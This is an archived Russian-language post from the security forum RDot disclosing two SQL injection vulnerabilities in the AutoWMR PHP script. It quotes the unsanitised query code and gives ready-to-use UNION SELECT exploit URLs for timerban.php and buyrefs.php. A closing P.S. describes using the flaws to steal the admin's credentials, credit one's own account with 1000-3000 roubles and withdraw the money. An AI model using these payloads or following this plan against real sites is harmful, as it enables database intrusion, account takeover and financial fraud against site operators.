RDot

RDot (https://rdot.org/forum/index.php)
-   Сценарии/CMF/СMS (https://rdot.org/forum/forumdisplay.php?f=15)
-   -   AutoWMR (https://rdot.org/forum/showthread.php?t=1213)

Online 08.02.2011 19:57
AutoWMR
 
AutoWMR (download)
Version: 1.0

SQL inj
if mq = of
Vuln file: timerban.php
PHP код:
///
if(isset($_GET["r"])){
$aidi=($_GET["r"]);
$sql="SELECT * FROM tb_ads WHERE id='$aidi'";
/// 
Exploit:
Код:
http://[host]/[path]/timerban.php?r=1' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+--+
SQL inj
if mq = of
Vuln file: buyrefs.php
PHP код:
///
$buy=($_GET["buy"]);

if(isset($buy)){
require('config.php');
$sql="SELECT * FROM tb_users WHERE id='$buy'";

/// 
Exploit:
Код:
http://[host]/[path]/buyrefs.php?buy=-1' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33+--+
P.S на этих движках стоят буксы. Регим акк на новенький кошель и пока забудем о нем... Так вот, узнаем из таблицы tb_users пароль|логин админа, заходим под ним, находим свой акк, начисляем 1000-3000 рублей (смотря сколько денег у админа :D), всё. Заходим под своим акком и автоматически выводим деньги ;).


Часовой пояс GMT +3, время: 18:09.

Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2021, Jelsoft Enterprises Ltd. Перевод: zCarot